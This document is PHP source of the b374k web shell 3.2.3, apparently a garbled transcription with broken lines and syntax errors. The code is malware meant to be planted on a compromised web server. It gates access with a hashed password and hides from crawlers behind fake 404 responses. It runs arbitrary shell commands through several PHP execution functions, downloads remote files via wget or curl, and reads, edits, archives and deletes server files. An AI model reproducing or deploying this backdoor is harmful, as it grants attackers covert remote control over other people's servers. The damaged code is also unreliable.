

```

<?php
/*
    b374k shell 3.2.3
    Jayalah Indonesiaku
    (c) 2014
    https://github.com/b374k/b374k

*/
$GLOBALS['pass'] = "90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad"; // sha1(md5(pass))
$GLOBALS['module_to_load'] = array("explorer", "terminal", "eval", "convert", "database", "info", "mail", "network", "processes");$GLOBALS['resources']['b374k'] = "hVXZrrM4En6gjARhC8yoL9hXQ9gDd2xhJ5yw8/Tj/Oef7tPSSG3JwjZVXY1flZ0nc/Lvuk/KAhmH8j9pMhUU8a864CxnQ3W5fLFwmK5fiX4JV9xny9o8G32+Txphqs9CfjhsqDheisVojklHbHNCldN17HJaGkpDHGhdFDpklnXd/aNwaGMgVWgoXoHvm2vqktW3PEmkD/Z7CBtSKFwVYXOX81wdh/mYNmh9uy2IwnNjLKB1cAYmEK+bjQWvxK+orA+8oiX9CB/f0dmlakNfVGenrKGaM/na5bJYFvJ1SgdAFVaf+rRgvU999mkYoJFL16pSULBmy+WJUvupTTgtU6XK9H1OSHG4FvwFHNcGCOKuChFmNCJqehEG3K0EDbuDmt4+06zR3RREv7N5HebBlir/ezZEeVe0Nm5G1xGjP/3Jege/uorV5zNquklx3PcGLLT6JkjPujd8lrSONnDONXDEd9+noWIYlGj3KG+s0PXDF+mE3WdzCGbklr7oJliIpCbc0fNqPW6l85gHH+tAnPlt85WSKMMq28qjKe3o2GXWHOiTTcl+wcIUec6XlonSgOmgmv1cBI60d3roxffDJE9GBX4BKbgV1n4/jLzOy7bhxGjNpXaK6w1HEwS3b8yX+TYuhayNjmnOICeOYm1G6LXcaFMUH/teZTS3ENIE+QU2EUIOdVLjNHIDNrcjmlv/0vfb1a4fmZyMymiqZnluwrwLoF2sGzo/3WF6+m1XYL9K1Ke7NzfZifT63w5JiENgVarZIx0CwCSCUB/AkCaCS4Ag5Z6LgtDx2N89Ysv3oBx60jwdzDLn5gdf+Hc//R7x7zdIffjwfpRw50JH3MViFMD81L9zSCUheeyBLkKNAfG/pE3+g72xutwRB81m2gdTb1ZgroD3z9t3xRNVMTtE5CwfnGzDTgH1sP/8GBumjy8dung/MBz/o53/iPe+vHdWP9PLX5qlGd+1aPfOvK33He//eo/D/4XGCKTpsSbBALSVg+XT51mtIveF8kPtc+/oh+s7XKA0yVMyc1czK0m5FcizEtp3j9Uobo/VtFeRwWLVl9WirnUKcXlW93Szk17izDlPcXIEFbigsglm4Bu3L7f8clGbN3VPcKlMC+WaGsJbLV5xpLkFwYn4nK/PwUux5s7Te7nMFjWuTxPwuxFN+fWDrpVEkUS5Ex458opjhDcjLNQZ05SfRiic/yxJYClJJ0GalwMFLbU6gX550e9lKYn/sJmVYGGiXy3N0wrpYvKrdGmF09vrvuSXhePUbezJ83DWEllMCqstgB6mN1DFTqlRjFHYXuoQS8VC57CK9a0j0aZJLwEtMql9hnM1CqajXPlsJmLrdJKyeyDCFF28zPzy/BwbK7F5Xa06LEld9yvNS5EeEnjezdVXtzNGOeQoww+W0C5CpCdqTQ2rFy2snHfB5tLaxnjaATL3yDQw3ntK3pgFvqi3FeCPK7MNmeabrjgNujuf9XNHOT3yyrws9lo0uWcT88uufc0DDYnn067Z2Iz9YA/06Nlnx6J76pWMD30jVPZGJdyv1qD4ioVxDtUloC8V2z4sSC9TJIZ5vFfrmY+EPCJS03cjcFMDdBGWV3zCZ+Lga+VMThJhf7Wtqk8CO8uPgbFdr+pAL/ElXfq9aIzt02QY6WVupahhDceF44u7I/TE31hQI2KEiKvhc7bGjxbwGOxaCTKptWrZ3XMAuYmqNLoVb4PhzUbTO0RLQ3T8zTOFK3wj+6V52G/Lhhp7t65JjIFRMMJHjrilgb9VGKGBsA6/4pfxGV29gx2755aq2/juOiGvnu325kquDsPUi7EG/w06zHjEhlVTHv8G4hcjaT8nnqPPRmhdlaOYGmrsFcoggzVNpbB19f4TlK6bWQoqUOnnnK8plsdesZ7WhmFVsSuPOx1Bhp45oUpElV7XhhE/TYvffXKszKl7t7TkzpzJO816zI9ki1soLaypb96w13/cBydJKPVPWP/wI=";
$GLOBALS['resources']['mime'] = "dZThdqMgEIX/7zn7DvMC2jz62t3HmQgaGkepCDFvvxEnis32xx3huwMYmUkwSvvcvRWMtIfz+Fbb5CeC0gsvp/YliSEARQZGAMoJyBZ9WN/Rpm7ADoUWNrEw+T7TlBmeJLemhgNCUu4EdH2EekLwh47Sd0Dcn9fuBX95U19GIpq+Rpn946FSudKXziyIflLc4PHnSn02r4Un05cm3ca2Nnn3yXPRc9NyTN0+jFXV8pXDO63gmBimvw0hQiuJH8ENLmnmS0h8s19mW74Nmdc9FK805vQeC0iyc7fp4kX3w8UUOWwQTekJY2U2fhWJYzTVuBooAa0hKAXIaJMMibeZLhEeh95dmeQK51ooBzJfYHe64axLgmYn1LZoOPPRngg7shneWbyQAahW9sAajvudgtg4cCWW+OQ/EDXmAxZTNTMTfWjIvHsFemf2F1KyHEFZzZmYrYk+vUysQoQwG0D6480CBm5dm4H2+tAC+HL0UioMCjYBnsWwtzcAU850K3aFELRNTXslhHW+1ek8RWlWLA8+2KYxI7fZzXTKke6Pawcm6IBGR9A3FJsPj4tKeesr3Y156E2ljqQ029f5b2IzCPHzWeT1wjh/Q2vLP6ytttox+SPsqPR1Ic/ZD0933dKY7SPmFYgla0dsr2S1PGjLvmKgGmRgGbWXNivIprgnZQt1gew46Stkm02f4RCp9A1DKjlnk6MmHUfLLYdhk+a7tc+cBCww8mbsA3pkN2j3hxmgr3up9EprkHw=="
$GLOBALS['resources']['arrow'] = "FZXHDqtYDIYfKCPRS2Z0F4cSem+BHFVQA6HD00+uF/Zny2XzSy7SNf23GVJYItMH/pelS0mT/zQhZ7kHqklwBD8zvaAWA/gj/m8KIA/iX+Du8jOjfwv8m1Oit/GjxfS5XYSyR7wZ9sdiLPaiE7rxwYZvDz3z0G0fn9Pt1PqiDLuyRgzA7sVpo2NvL3Cdy6p1eSS3Um21eZqfW2uc6Xc9STYjG0E8zybZ3lxYrGLgmiJ6FTgD+oE1fHzRyB9IXpFlT+6J8XARNRivqAELyNW694fBYKgdQ54i2RquOgoIwOqEprK6G66qk4HjFCAWX9NRp5cU6hMsdvSQhiGCXr7Hmfyl/Tar9KwjDxldWnp9wx7zux2sY0uWUABDxUQWhoG2Dt8WlOYIuH8fjpej010Ag3k01AHYyLNN07exzAS7jczTk5oogzN1ETVL5g2TcLYQI7n5y+9dRXzgn4z19fKr4mPCsLm+Z4fhc9nFab7ORjmJSOarH0XxJM8bMHBKHEngreEnB4RwFNGUb1wm6yMFd9syRt0rPChfJ4e7D2md63/czFE+B2LsNxepkwZeLntSUuYyuCTZGb0bYMBi9Pft3ACaK/fyDUE8GzeuLXB10WiI/zRT7snWMV7vXc0BLFWQvIvSYKjgt0iIKJO8refV4ahnMA1JrdKx1HMiyyMoZnMgQX7W2Jb4/tudaDRtJOUZY5FAFBpEnYQIABEU5E+XyKu3pqrizh676B29Ssyk1ZzcZwLkwlms5igcnOp1+1ekSSQK9Lv0S2ZnH92jrgEbjN0b9d0440K4Z4mIc2VxoxzZepz0+WlZcJrra8wYG5RKqDNe3w+ODQnrPzk+OyZo+z8kL8HK3XNhcc7Cy92cVYW3WsVZpSzZCveopM1Uun/XlOfzTwnVpt8ShAFmZsxB3sNWkvLAUSxdyHWMgealyH4jjVBb3QaAFPrxU3v6VD7DsFpOCVxSwRzSfSw6GalqFmVUXS3tV9WjJkhkxZAMaHLA7+0NJ7dy9abkmqhppR9oAYIJM9g3OHTD+8+wQtKYMCiHSxQxMEzWvkkTKPzgsKfd/F3m4WH091AfUtThQ+JA2pMvbnJ6t8SLwdtZxvR47Ze0Z0Vkc5F6c7eSx16n8/pudIYGL89MitziHEuXxVYD3J+qt9oQ4PjqsQjEOewetHZEUF8UCRYjHw7vmxoe0Bjtx59p4PftRrDqXDRXTLqQ1NGLVE613PVZmyaIRe6SnV9b8SCdA91B7a1hB8RS3xWHIXdY6T9TwCc0xRi3IZGTB74VSS6rLkrXVm0jVjJQNstEz3DCNOpVy3Xk91cVJxbaOKEbFvrQCy2fxSUzhanvPq5bmcNWTpg3UbmSxOPWSS5TTTvo/W8LsiZ6Sdzdm2qGSqJapvuncb/jl1lc4i60NN53TasogwL0a/GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f+reA04QDBaEQtRg0YRlb/E0ksyici4MM1H1VvVqQ1z0aqMXesSlvqz7Y4baL0WvNHvflRnLNLxLR5IFfb9KrZT97Lotz8OfTJJ9ugSFhVYy9nzcUrvC+vbF6zdrWpYtPek+rxjaeMog4pvOibJ3wOTQmFb3d/atN9HV7ZsuZFAIRngH0vQKZXb+fgB0dQNKndSVQvJnz/8=";
$GLOBALS['ver'] = "3.2.3";
$GLOBALS['title'] = "b374k";

@ob_start();
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
@ini_set('html_errors', '0');
@ini_set('display_errors', '1');

```

```
@ini_set('display_startup_errors','1');
@ini_set('log_errors','0');
@set_time_limit(0);
@clearstatcache();

if(!function_exists('auth')){
    function auth(){
        if(isset($GLOBALS['pass']) && (trim($GLOBALS['pass'])!='')){
            $c = $_COOKIE;
            $p = $_POST;
            if(isset($p['pass'])){
                $your_pass = sha1(md5($p['pass']));
                if($your_pass==$GLOBALS['pass']){
                    setcookie("pass", $your_pass, time()+36000, "/");
                    header("Location: ".get_self());
                }
            }

            if(!isset($c['pass']) || ((isset($c['pass'])&&($c['pass']!=$GLOBALS
['pass'])))){
                $res = "<!doctype html>
<html>
<head>
<meta charset='utf-8'>
<meta name='robots' content='noindex, nofollow, noarchive'>
<meta name='viewport' content='width=device-width, initial-scale=1.0, maxim
um-scale=1.0, user-scalable=no, user-scalable=0'>
</head>
<body style='background:#f8f8f8;color:#000000;padding:0;margin:0;'><br><p><
center><noscript>You need to enable javascript</noscript></center></p>
<script type='text/javascript'>
var d = document;
d.write("<br><br><form method='post'><center><input type='password' id='pa
ss' name='pass' style='font-size:34px;width:34%;outline:none;text-align:center;background:#
ffffff;padding:8px;border:1px solid #cccccc;border-radius:8px;color:#000000;'></center></fo
rm>\"");
d.getElementById('pass').focus();
d.getElementById('pass').setAttribute('autocomplete', 'off');
</script>
</body></html>
";
                echo $res;
                die();
            }
        }
    }
}

if(!function_exists('get_server_info')){
    function get_server_info(){
        $server_addr = isset($_SERVER['SERVER_ADDR'])? $_SERVER['SERVER_ADDR']:$SE
RVER["HTTP_HOST"];
        $server_info['ip_address'] = "Server IP : ".$server_addr." <span class='str
ong'>|</span> Your IP : ".$_SERVER['REMOTE_ADDR'];
        $server_info['time_at_server'] = "Time <span class='strong'>@</span> Server
 : ".$date("d M Y H:i:s",time());
        $server_info['uname'] = php_uname();
        $server_software = (getenv('SERVER_SOFTWARE')!='')? getenv('SERVER_SOFTWARE
')." <span class='strong'>|</span> ':'";
        $server_info['software'] = $server_software." PHP ".phpversion();

        return $server_info;
    }
}

if(!function_exists('get_self')){
    function get_self(){
        $query = (isset($_SERVER["QUERY_STRING"])&&!empty($_SERVER["QUERY_STRING"]
```

```
)))?"?".$_SERVER["QUERY_STRING"]:"";
    return html_safe($_SERVER["REQUEST_URI"].$query);
}
}

if(!function_exists('get_post')){
    function get_post(){
        return fix_magic_quote($_POST);
    }
}

if(!function_exists('get_nav')){
    function get_nav($path){
        return parse_dir($path);
    }
}

if(!function_exists('get_cwd')){
    function get_cwd(){
        $cwd = getcwd().DIRECTORY_SEPARATOR;
        if(!isset($_COOKIE['cwd'])){
            setcookie("cwd", $cwd);
        }
        else{
            $cwd_c = rawurldecode($_COOKIE['cwd']);
            if(is_dir($cwd_c)) $cwd = realpath($cwd_c).DIRECTORY_SEPARATOR;
            else setcookie("cwd", $cwd);
        }
        return $cwd;
    }
}

if(!function_exists('wrap_with_quotes')){
    function wrap_with_quotes($str){
        return "\"".$str."\"";
    }
}

if(!function_exists('get_resource')){
    function get_resource($type){
        if(isset($GLOBALS['resources'][$type])){
            return gzinflate(base64_decode($GLOBALS['resources'][$type]));
        }
        return false;
    }
}

if(!function_exists('block_bot')){
    function block_bot(){
        // block search engine bot
        if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|s
lurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_
USER_AGENT']))) {
            header("HTTP/1.0 404 Not Found");
            header("Status: 404 Not Found");
            die();
        }
        elseif(!isset($_SERVER['HTTP_USER_AGENT'])) {
            header("HTTP/1.0 404 Not Found");
            header("Status: 404 Not Found");
            die();
        }
    }
}

if(!function_exists('is_win')){
    function is_win(){
        return (strtolower(substr(PHP_UNAME(),0,3)) == "win")? true : false;
    }
}
```

```
    }
}

if(!function_exists('fix_magic_quote')){
    function fix_magic_quote($arr){
        $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
        if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
            if(is_array($arr)){
                foreach($arr as $k=>$v){
                    if(is_array($v)) $arr[$k] = clean($v);
                    else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\\'", "\'", $v));
                }
            }
        }
        return $arr;
    }
}

if(!function_exists('execute')){
    function execute($code){
        $output = "";
        $code = $code." 2>&1";

        if(is_callable('system') && function_exists('system')){
            ob_start();
            @system($code);
            $output = ob_get_contents();
            ob_end_clean();
            if(!empty($output)) return $output;
        }
        elseif(is_callable('shell_exec') && function_exists('shell_exec')){
            $output = @shell_exec($code);
            if(!empty($output)) return $output;
        }
        elseif(is_callable('exec') && function_exists('exec')){
            @exec($code,$res);
            if(!empty($res)) foreach($res as $line) $output .= $line;
            if(!empty($output)) return $output;
        }
        elseif(is_callable('passthru') && function_exists('passthru')){
            ob_start();
            @passthru($code);
            $output = ob_get_contents();
            ob_end_clean();
            if(!empty($output)) return $output;
        }
        elseif(is_callable('proc_open') && function_exists('proc_open')){
            $desc = array(
                0 => array("pipe", "r"),
                1 => array("pipe", "w"),
                2 => array("pipe", "w"));
            $proc = @proc_open($code, $desc, $pipes, getcwd(), array());
            if(is_resource($proc)){
                while($res = fgets($pipes[1])){
                    if(!empty($res)) $output .= $res;
                }
                while($res = fgets($pipes[2])){
                    if(!empty($res)) $output .= $res;
                }
            }
            @proc_close($proc);
            if(!empty($output)) return $output;
        }
        elseif(is_callable('popen') && function_exists('popen')){
            $res = @popen($code, 'r');
            if($res){
                while(!feof($res)){

```

```
        $output .= fread($res, 2096);
    }
    fclose($res);
}
if(!empty($output)) return $output;
}
return "";
}
}

if(!function_exists('html_safe')){
    function html_safe($str){
        return htmlspecialchars($str, 2 | 1);
    }
}

if(!function_exists('parse_dir')){
    function parse_dir($path){
        $path = realpath($path).DIRECTORY_SEPARATOR;
        $paths = explode(DIRECTORY_SEPARATOR, $path);
        $res = "";
        for($i = 0; $i < sizeof($paths)-1; $i++){
            $x = "";
            for($j = 0; $j <= $i; $j++) $x .= $paths[$j].DIRECTORY_SEPARATOR;
            $res .= "<a class='navbar' data-path='".html_safe($x)."'>".html_saf
e($paths[$i])." ".DIRECTORY_SEPARATOR." </a>";
        }
        if(is_win()) $res = get_drives().$res;
        return trim($res);
    }
}

if(!function_exists('zip')){
    function zip($files, $archive){
        $status = false;
        if(!extension_loaded('zip')) return $status;
        if(class_exists("ZipArchive")){
            $zip = new ZipArchive();
            if(!$zip->open($archive, 1)) return $status;

            if(!is_array($files)) $files = array($files);
            foreach($files as $file){
                $file = str_replace(get_cwd(), '', $file);
                $file = str_replace('\\', '/', $file);
                if(is_dir($file)){
                    $filesIterator = new RecursiveIteratorIterator(new
RecursiveDirectoryIterator($file), 1);
                    foreach($filesIterator as $iterator){
                        $iterator = str_replace('\\', '/', $iterato
r);
                        if(in_array(substr($iterator, strrpos($iter
ator, '/')+1), array('.', '..'))) continue;

                        if(is_dir($iterator)) $zip->addEmptyDir(str
_replace($file.'/', '', $iterator.'/'));
                        else if(is_file($iterator)) $zip->addFromSt
ring(str_replace($file.'/', '', $iterator), read_file($iterator));
                    }
                }
                elseif(is_file($file)) $zip->addFromString(basename($file),
read_file($file));
            }
            if($zip->getStatusString()!==false) $status = true;
            $zip->close();
        }
        return $status;
    }
}
}
```

```
if(!function_exists('compress')){
    function compress($type, $archive, $files){
        if(!is_array($files)) $files = array($files);
        if($type=='zip'){
            if(zip($files, $archive)) return true;
            else return false;
        }
        elseif(($type=='tar') || ($type=='targz')){
            $archive = basename($archive);

            $listsBasename = array_map("basename", $files);
            $lists = array_map("wrap_with_quotes", $listsBasename);

            if($type=='tar') execute("tar cf \"\".$archive.\"\" \" \"implode(" ", $lists));
            elseif($type=='targz') execute("tar czf \"\".$archive.\"\" \" \"implode(" ", $lists));

            if(is_file($archive)) return true;
            else return false;
        }
        return false;
    }
}

if(!function_exists('decompress')){
    function decompress($type, $archive, $path){
        $path = realpath($path).DIRECTORY_SEPARATOR;
        $status = false;
        if(is_dir($path)){
            chdir($path);
            if($type=='unzip'){
                if(class_exists('ZipArchive')){
                    $zip = new ZipArchive();
                    $target = $path.basename($archive, ".zip");
                    if($zip->open($archive)){
                        if(!is_dir($target)) mkdir($target);
                        if($zip->extractTo($target)) $status = true;
                    }
                    $zip->close();
                }
            }
            elseif($type=='untar'){
                $target = basename($archive, ".tar");
                if(!is_dir($target)) mkdir($target);
                $before = count(get_all_files($target));
                execute("tar xf \"\".basename($archive).\"\" -C \"\".$target.\"\"");
                $after = count(get_all_files($target));
                if($before!=$after) $status = true;
            }
            elseif($type=='untargz'){
                $target = "";
                if(strpos(strtolower($archive), ".tar.gz")!==false) $target = basename($archive, ".tar.gz");
                elseif(strpos(strtolower($archive), ".tgz")!==false) $target = basename($archive, ".tgz");

                if(!is_dir($target)) mkdir($target);
                $before = count(get_all_files($target));
                execute("tar xzf \"\".basename($archive).\"\" -C \"\".$target.\"\"");
                $after = count(get_all_files($target));
                if($before!=$after) $status = true;
            }
        }
    }
}
```

```
    }
    return $status;
}
}

if(!function_exists('download')){
    function download($url,$saveas){
        if(!preg_match("/[a-z]+:\//\./", $url)) return false;
        $filename = basename($url);

        if($content = read_file($url)){
            if(is_file($saveas)) unlink($saveas);
            if(write_file($saveas, $content)){
                return true;
            }
        }

        $buff = execute("wget ".$url." -O ".$saveas);
        if(is_file($saveas)) return true;

        $buff = execute("curl ".$url." -o ".$saveas);
        if(is_file($saveas)) return true;

        $buff = execute("lwp-download ".$url." ".$saveas);
        if(is_file($saveas)) return true;

        $buff = execute("lynx -source ".$url." > ".$saveas);
        if(is_file($saveas)) return true;

        return false;
    }
}

if(!function_exists('get_fileperms')){
    function get_fileperms($file){
        if($perms = @fileperms($file)){
            $flag = 'u';
            if(($perms & 0xC000) == 0xC000)$flag = 's';
            elseif(($perms & 0xA000) == 0xA000)$flag = 'l';
            elseif(($perms & 0x8000) == 0x8000)$flag = '-';
            elseif(($perms & 0x6000) == 0x6000)$flag = 'b';
            elseif(($perms & 0x4000) == 0x4000)$flag = 'd';
            elseif(($perms & 0x2000) == 0x2000)$flag = 'c';
            elseif(($perms & 0x1000) == 0x1000)$flag = 'p';
            $flag .= ($perms & 00400)? 'r':'-';
            $flag .= ($perms & 00200)? 'w':'-';
            $flag .= ($perms & 00100)? 'x':'-';
            $flag .= ($perms & 00040)? 'r':'-';
            $flag .= ($perms & 00020)? 'w':'-';
            $flag .= ($perms & 00010)? 'x':'-';
            $flag .= ($perms & 00004)? 'r':'-';
            $flag .= ($perms & 00002)? 'w':'-';
            $flag .= ($perms & 00001)? 'x':'-';
            return $flag;
        }
        else return "????????????";
    }
}

if(!function_exists('format_bit')){
    function format_bit($size){
        $base = log($size) / log(1024);
        $suffixes = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
        return round(pow(1024, $base - floor($base)),2)." ".$suffixes[floor($base)]
;
    }
}
```

```
if(!function_exists('get_filesize')){
    function get_filesize($file){
        $size = @filesize($file);
        if($size!==false){
            if($size<=0) return 0;
            return format_bit($size);
        }
        else return "???" ;
    }
}

if(!function_exists('get_filemtime')){
    function get_filemtime($file){
        return @date("d-M-Y H:i:s", filemtime($file));
    }
}

if(!function_exists('get_fileowner')){
    function get_fileowner($file){
        $owner = "?:?";
        if(function_exists("posix_getpwuid")){
            $name = posix_getpwuid(fileowner($file));
            $group = posix_getgrgid(filegroup($file));
            $owner = $name['name'].":".$group['name'];
        }
        return $owner;
    }
}

if(!function_exists('rmdirs')){
    function rmdirs($dir, $counter = 0){
        if(is_dir($dir)) $dir = realpath($dir).DIRECTORY_SEPARATOR;
        if($dh = opendir($dir)){
            while(($f = readdir($dh))!==false){
                if(($f!='.')&&($f!='..')){
                    $f = $dir.$f;
                    if(@is_dir($f)) $counter += rmdirs($f);
                    else{
                        if(unlink($f)) $counter++;
                    }
                }
            }
            closedir($dh);
            if(rmdir($dir)) $counter++;
        }
        return $counter;
    }
}

if(!function_exists('copys')){
    function copys($source, $target, $c=0){
        $source = realpath($source).DIRECTORY_SEPARATOR;
        if($dh = opendir($source)){
            if(!is_dir($target)) mkdir($target);
            $target = realpath($target).DIRECTORY_SEPARATOR;

            while(($f = readdir($dh))!==false){
                if(($f!='.')&&($f!='..')){
                    if(is_dir($source.$f)){
                        copys($source.$f, $target.$f, $c);
                    }
                    else{
                        if(copy($source.$f, $target.$f)) $c++;
                    }
                }
            }
            closedir($dh);
        }
    }
}
```



```
        return $c;
    }
}

if(!function_exists('get_all_files')){
    function get_all_files($path){
        $path = realpath($path).DIRECTORY_SEPARATOR;
        $files = glob($path.'*');
        for($i = 0; $i<count($files); $i++){
            if(is_dir($files[$i])){
                $subdir = glob($files[$i].DIRECTORY_SEPARATOR.'*');
                if(is_array($files) && is_array($subdir)) $files = array_mer
ge($files, $subdir);
            }
        }
        return $files;
    }
}

if(!function_exists('read_file')){
    function read_file($file){
        $content = false;
        if($fh = @fopen($file, "rb")){
            $content = "";
            while(!feof($fh)){
                $content .= fread($fh, 8192);
            }
        }
        return $content;
    }
}

if(!function_exists('write_file')){
    function write_file($file, $content){
        if($fh = @fopen($file, "wb")){
            if(fwrite($fh, $content)!==false) return true;
        }
        return false;
    }
}

if(!function_exists('view_file')){
    function view_file($file, $type, $preserveTimestamp='true'){
        $output = "";
        if(is_file($file)){
            $dir = dirname($file);

            $owner = "";
            if(!is_win()){
                $owner = "<tr><td>Owner</td><td>".get_fileowner($file)."</t
d></tr>";
            }

            $image_info = @getimagesize($file);
            $mime_list = get_resource('mime');
            $mime = "";
            $file_ext_pos = strrpos($file, ".");
            if($file_ext_pos!==false){
                $file_ext = trim(substr($file, $file_ext_pos),".");
                if(preg_match("/([^\s]+)\ .*\.b".$file_ext."\b.*\/i", $mime_l
ist, $res)){
                    $mime = $res[1];
                }
            }
            if($type=="auto"){
                if(is_array($image_info)) $type = 'image';
                //elseif(strtolower(substr($file,-3,3)) == "php") $type = "
code";
            }
        }
    }
}
```

```

        elseif(!empty($mime)) $type = "multimedia";
        else $type = "raw";
    }

    $content = "";
    if($type=="code"){
        $hl_arr = array(
            "hl_default"=> ini_get('highlight.default'),
            "hl_keyword"=> ini_get('highlight.keyword'),
            "hl_string"=> ini_get('highlight.string'),
            "hl_html"=> ini_get('highlight.html'),
            "hl_comment"=> ini_get('highlight.comment')
        );

        $content = highlight_string(read_file($file),true);
        foreach($hl_arr as $k=>$v){
            $content = str_replace("<font color=\"".$v."\">", "<font class='".$k."'>", $content);
            $content = str_replace("<span style=\"color: ".$v.\">", "<span class='".$k."'>", $content);
        }
    }
    elseif($type=="image"){
        $width = (int) $image_info[0];
        $height = (int) $image_info[1];
        $image_info_h = "Image type = <span class='strong'>(</span>".
        ".$image_info['mime'].<span class='strong'>)</span><br>
        Image Size = <span class='strong'>(</span>".$width
        ." x ".$height."<span class='strong'> )</span><br>";
        if($width > 800){
            $width = 800;
            $imglink = "<p><a id='viewFullsize'>
            <span class='strong'>[ </span>View Full Size<span c
            lass='strong'> ]</span></a></p>";
        }
        else $imglink = "";

        $content = "<center>".$image_info_h."<br>".$imglink."
        <img id='viewImage' style='width: ".$width."px;' src
        ='data: ".$image_info['mime'].";base64, ".base64_encode(read_file($file))."' alt=' ".$file."'>
        </center>";
    }
    }
    elseif($type=="multimedia"){
        $content = "<center>
        <video controls>
        <source src='' type=' ".$mime."'>
        </video>
        <p><span class='button' onclick=\"multimedia('".html_safe(addslashes($file))."');\">Load Multimedia File</span></p>
        </center>";
    }
    }
    elseif($type=="edit"){
        $preservecheckbox = ($preserveTimestamp=='true')? " cBoxSelecte
        d":"";

        $content = "<table id='editTbl'><tr><td colspan='2'><input
        type='text' id='editFilename' class='colSpan' value='".html_safe($file)."' onkeydown=\"trap
        _enter(event, 'edit_save_raw');\"></td></tr><tr><td class='colFit'><span class='button' onc
        lick=\"edit_save_raw();\">save</span></td><td style='vertical-align:middle;'><div class='cB
        ox'$.preservecheckbox.\"></div><span>preserve modification timestamp</span><span id='editResult

```

```
'></span></td></tr><tr><td colspan='2'><textarea id='editInput' spellcheck='false' onkeydown=
n=\"trap_ctrl_enter(this, event, 'edit_save_raw');\">\".html_safe(read_file($file)).\"</textare
rea></td></tr></table>";
    }
    elseif($stype=="hex"){
        $preservecheckbox = ($preserveTimestamp=="true")? " cBoxSelecte
d":"";
        $content = "<table id='editTbl'><tr><td colspan='2'><input
type='text' id='editFilename' class='colSpan' value='\".html_safe($file).\"' onkeydown=\\\"trap
_enter(event, 'edit_save_hex');\\\"></td></tr><tr><td class='colFit'><span class='button' onc
lick=\\\"edit_save_hex();\\\">save</span></td><td style='vertical-align:middle;'><div class='cB
ox\".$preservecheckbox.\"'></div><span>preserve modification timestamp</span><span id='editHexRes
ult'></span></td></tr><tr><td colspan='2'><textarea id='editInput' spellcheck='false' onkey
down=\\\"trap_ctrl_enter(this, event, 'edit_save_hex');\\\">\".bin2hex(read_file($file)).\"</text
area></td></tr></table>";
    }
    else $content = "<pre>\".html_safe(read_file($file)).\"</pre>";

    $output .= "
<table id='viewFile' class='boxtbl'>
<tr><td style='width:120px;'>Filename</td><td>\".html_safe($file).\"</td></tr>
<tr><td>Size</td><td>\".get_filesize($file).\" (\".filesize($file).\")</td></tr>
\".$owner.\"
<tr><td>Permission</td><td>\".get_fileperms($file).\"</td></tr>
<tr><td>Create time</td><td>\".@date("d-M-Y H:i:s",filetime($file)).\"</td></tr>
<tr><td>Last modified</td><td>\".@date("d-M-Y H:i:s",filemtime($file)).\"</td></tr>
<tr><td>Last accessed</td><td>\".@date("d-M-Y H:i:s",fileatime($file)).\"</td></tr>
<tr data-path='\".html_safe($file).\"'><td colspan='2'>
<span class='navigate button' style='width:120px;'>explorer</span>
<span class='action button' style='width:120px;'>action</span>
<span class='button' style='width:120px;' onclick=\\\"view('\".html_safe(addslashes($f
ile)).\", 'raw');hide_box();\\\">raw</span>
<span class='button' style='width:120px;' onclick=\\\"view('\".html_safe(addslashes($f
ile)).\", 'code');hide_box();\\\">code</span>
<span class='button' style='width:120px;' onclick=\\\"view('\".html_safe(addslashes($f
ile)).\", 'hex');hide_box();\\\">hex</span>
<span class='button' style='width:120px;' onclick=\\\"view('\".html_safe(addslashes($f
ile)).\", 'image');hide_box();\\\">image</span>
<span class='button' style='width:120px;' onclick=\\\"view('\".html_safe(addslashes($f
ile)).\", 'multimedia');hide_box();\\\">multimedia</span>
</td></tr>
<tr><td colspan='2'><div id='viewFilecontent'>\".$content.\"</div></td></tr>
</table>";

    }
    else $output = "error";
    return $output;
}
}

if(!function_exists('get_writable_dir')){
    function get_writable_dir(){
        if(is_writable(".")) return realpath(".").DIRECTORY_SEPARATOR;
        else{
            foreach(array('TMP', 'TEMP', 'TMPDIR') as $k){
                if(!empty($_ENV[$k])){
                    if(is_writable($_ENV[$k])) return realpath($_ENV[$k
]) . DIRECTORY_SEPARATOR;
                }
            }
            if(function_exists("sys_get_temp_dir")){
                $dir = sys_get_temp_dir();
                if(is_writable($dir)) return realpath($dir).DIRECORY_SEPAR
ATOR;
            }
        }
    }
}
```

```
        else{
            if(!is_win()){ if(is_writable("/tmp")) return "/tmp/"; }
        }

        $tempfile = tempnam(__FILE__, '');
        if(file_exists($tempfile)){
            $dir = realpath(dirname($tempfile)).DIRECTORY_SEPARATOR;
            unlink($tempfile);
            return $dir;
        }
    }
    return false;
}

if(!function_exists('get_drives')){
    function get_drives(){
        $drives = "";
        $v = explode("\\", get_cwd());
        $v = $v[0];
        foreach (range("A", "Z") as $letter){
            if(@is_readable($letter.":\\")){
                $drives .= "<a class='navbar' data-path='".$letter.":\\'>[
";
                if($letter.":" != $v) $drives .= $letter;
                else{$drives .= "<span class='drive-letter'>".$letter."</sp
an>";}
                $drives .= " ]</a> ";
            }
        }
        return $drives;
    }
}

if(!function_exists('show_all_files')){
    function show_all_files($path){
        if(!is_dir($path)) return "No such directory : ".$path;
        chdir($path);
        $output = "";
        $allfiles = $allfolders = array();
        if($res = opendir($path)){
            while($file = readdir($res)){
                if(($file!='.')&&($file!="..")){
                    if(is_dir($file)) $allfolders[] = $file;
                    elseif(is_file($file))$allfiles[] = $file;
                }
            }
        }

        array_unshift($allfolders, ".");
        $cur = getcwd();
        chdir("..");
        if(getcwd()!=$cur) array_unshift($allfolders, "..");
        chdir($cur);

        natcasesort($allfolders);
        natcasesort($allfiles);

        $cols = array();
        if(is_win()){
            $cols = array(
                "perms"=>"get_fileperms",
                "modified"=>"get_filemtime"
            );
        }
        else{
            $cols = array(
                "owner"=>"get_fileowner",
```

```
        "perms"=>"get_fileperms",
        "modified"=>"get_filemtime"
    );
}

$totalFiles = count($allfiles);
$totalFolders = 0;

$output .= "<table id='xplTable' class='dataView sortable'><thead>";
$output .= "<tr><th class='col-cbox sortable_nosort'><div class='cBoxAll'>
